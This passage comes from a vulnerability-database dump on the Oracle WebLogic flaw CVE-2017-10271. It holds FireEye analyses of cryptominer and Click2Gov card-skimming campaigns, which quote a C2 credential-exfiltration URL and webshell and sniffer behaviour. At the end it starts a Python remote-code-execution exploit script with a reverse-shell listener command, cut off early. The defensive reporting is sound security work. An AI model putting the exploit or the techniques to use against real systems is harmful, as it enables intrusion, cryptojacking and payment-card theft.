cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://&lt;C2&gt;:8000/api.php?data=&lt;credential data&gt;'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T16:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques\nUsed Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T16:30:00", "id": "FIREEYE:57B0F10A16E18DC672833B1812005B76", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://&lt;C2&gt;:8000/api.php?data=&lt;credential data&gt;'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T11:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T11:30:00", "id": "FIREEYE:399092589F455855881447C60B56C21A", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-11T20:17:40", "description": "FireEye has been tracking a campaign this year targeting web payment portals that involves on-premise installations of Click2Gov. [Click2Gov](<https://www.superion.com/public-administration/click2gov/>) is a web-based, interactive self-service bill-pay software solution developed by Superion. It includes various modules that allow users to pay bills associated with various local government services such as utilities, building permits, and business licenses. In October 2017, Superion released a statement [confirming suspicious activity](<https://www.superion.com/ceo-response-to-reported-breach/>) had affected a small number of customers. In mid-June 2018, numerous media reports referenced at least seven Click2Gov customers that were possibly affected by this campaign. Since June 2018, additional victims have been identified in public reporting. A review of public statements by these organizations appear to confirm compromises associated with Click2Gov.\n\nOn June 15, 2018, Superion released a statement describing their [proactive notification to affected customers](<https://www.superion.com/click2gov-update/>), work with a third-party forensic firm (not Mandiant), and deployment of patches to Click2Gov software and a related third-party component. Superion then concluded that there was no evidence that it is unsafe to make payments utilizing Click2Gov on hosted or secure on-premise networks with recommended patches and configurations.\n\nMandiant forensically analyzed compromised systems and recovered malware associated with this campaign, which provided insight into the capabilities of this new attacker. As of this publication, the discussed malware families have very low detection rates by antivirus solutions, as reported by VirusTotal.\n\n#### Attack Overview\n\nThe first stage of the campaign typically started with the attacker uploading a SJavaWebManage webshell to facilitate interaction with the compromised Click2Gov webserver. Through interaction with the webshell, the attacker enabled debug mode in a Click2Gov configuration file causing the application to write payment card information to plaintext log files. The attacker then uploaded a tool, which FireEye refers to as FIREALARM, to the webserver to parse these log files, retrieve the payment card information, and remove all log entries not containing error messages. Additionally, the attacker used another tool, SPOTLIGHT, to intercept payment card information from HTTP network traffic. The remainder of this blog post dives into the details of the attacker's tactics, techniques, and procedures (TTPs).\n\n#### SJavaWebManage Webshell\n\nIt is not known how the attacker compromised the Click2Gov webservers, but they likely employed an exploit targeting Oracle Web Logic such as CVE-2017-3248, CVE-2017-3506, or CVE-2017-10271, which would provide the capability to upload arbitrary files or achieve remote access. After exploiting the vulnerability, the attacker uploaded a variant of the [publicly available JavaServer Pages (JSP) webshell SJavaWebManage](<https://github.com/tennc/webshell/blob/master/jsp/SJavaWebManageV1.4.jsp>) to maintain persistence on the webserver. SJavaWebManage requires authentication to access four specific pages, as depicted in Figure 1, and will execute commands in the context of the Tomcat service, by default the Local System account.\n\n \nFigure 1: Sample SJavaWebManage interface\n\n * **EnvsInfo**: Displays information about the Java runtime, Tomcat version, and other information about the environment.\n * **FileManager**: Provides the ability to browse, upload, download (original or compressed), edit, delete, and timestomp files.\n * **CMDS**: Executes a command using cmd.exe (or /bin/sh if on a non-Windows system) and returns the response.\n * **DBManage**: Interacts with a database by connecting, displaying database metadata, and executing SQL commands.\n\nThe differences between the publicly available webshell and this variant include variable names that were changed to possibly inhibit detection, Chinese characters that were changed to English, references to SjavaWebManage that were deleted, and code to handle updates to the webshell being removed. Additionally, the variant identified during the campaign investigation included the ability to manipulate file timestamps on the server. This functionality is not present in the public version. The SJavaWebManage webshell provided the attacker a sufficient interface to easily interact with and manipulate the compromised hosts.\n\nThe attacker would then restart a module in DEBUG mode using the SJavaWebManage CMDS page after editing a Click2Gov XML configuration file. With the DEBUG logging option enabled, the Click2Gov module would log plaintext payment card data to the Click2Gov log files with naming convention Click2GovCX.logYYYY-MM-DD.\n\n#### FIREALARM\n\nUsing interactive commands within the webshell, the attacker uploaded and executed a datamining utility FireEye tracks as FIREALARM, which parses through Click2Gov log files to retrieve payment card data, format the data, and print it to the console.\n\nFIREALARM is a command line tool written in C/C++ that accepts three numbers as arguments; Year, Month, and Day, represented in a sample command line as: evil.exe 2018 09 01. From this example, FIREALARM would attempt to open and parse logs starting on 2018-09-01 until the present day. If the log files exists, FIREALARM copies the MAC (Modified, Accessed, Created) times to later timestomp the corresponding file back to original times. Each log file is then read line by line and parsed. FIREALARM searches each line for the following contents and parses the data:\n\n * medium.accountNumber\n * medium.cvv2\n * medium.expirationDate.year\n * medium.expirationDate.month\n * medium.firstName\n * medium.lastName\n * medium.middleInitial\n * medium.contact.address1\n * medium.contact.address2\n * medium.contact.city\n * medium.contact.state\n * medium.contact.zip.code\n\nThis data is formatted and printed to the console. The malware also searches for lines that contain the text ERROR -. If this string is found, the utility stores the contents in a temporary file named %WINDIR%\\temp\\THN1080.tmp. After searching every line in the Click2GovCX log file, the temporary file THN1080.tmp is copied to replace the respective Click2GovCX log file and the timestamps are replaced to the original, copied timestamps. The result is that FIREALARM prints payment card information to the console and removes the payment card data from each Click2GovCX log file, leaving only the error messages. Finally, the THN1080.tmp temporary file is deleted. This process is depicted in Figure 2.\n\n \nFigure 2: FIREALARM workflow\n\n 1. Attacker traverses Tor or other proxy and authenticates to SjavaWebManage.\n 2. Attacker launches cmd prompt via webshell.\n 3. Attacker runs FIREALARM with parameters.\n 4. FIREALARM verifies and iterates through log files, copies MAC times, parses and prints payment card data to the console, copies error messages to THN1080.tmp, overwrites the original log file and timestomps with orginal times.\n 5. THN1080.tmp is deleted.\n\n#### SPOTLIGHT\n\nLater, during attacker access to the compromised system, the attacker used the webshell to upload a network sniffer FireEye tracks as SPOTLIGHT. This tool offered the attacker better persistence to the host and continuous collection of payment card data, ensuring the mined data would not be lost if Click2GovCX log files were deleted by an administrator. SPOTLIGHT is also written in C/C++ and may be installed by command line arguments or run as a service. When run as a service, its tasks include ensuring that two JSP files exist, and monitoring and logging network traffic for specific HTTP POST request contents.\n\nSPOTLIGHT accepts two command line arguments:\n\n * gplcsvc.exe -i Creates a new service named gplcsvc with the display name Group Policy Service\n * gplcsvc.exe -u Stops and deletes the service named gplcsvc\n\nUpon installation, SPOTLIGHT will monitor two paths on the infected host every hour:\n\n 1. C:\\bea\\c2gdomain\\applications\\Click2GovCX\\scripts\\validator.jsp\n 2. C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:\n\n * &lt;op:AccountNum&gt;\n * &lt;op:CSC&gt;\n * &lt;op:ExpDate&gt;\n * &lt;op:FirstName&gt;\n * &lt;op:LastName&gt;\n * &lt;op:MInitial&gt;\n * &lt;op:Street1&gt;\n * &lt;op:Street2&gt;\n * &lt;op:City&gt;\n * &lt;op:State&gt;\n * &lt;op:PostalCode&gt;\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected modifications. Another best practice is to ensure any web service accounts run at least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations &amp; Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting a nation-state or financial gains intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-19T10:00:00", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3506", "CVE-2017-3248", "CVE-2017-10271"], "modified": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": "https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "cvss3": {}, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "id": "1337DAY-ID-29395", "href": "https://0day.today/exploit/description/29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. E.g.\r\n # 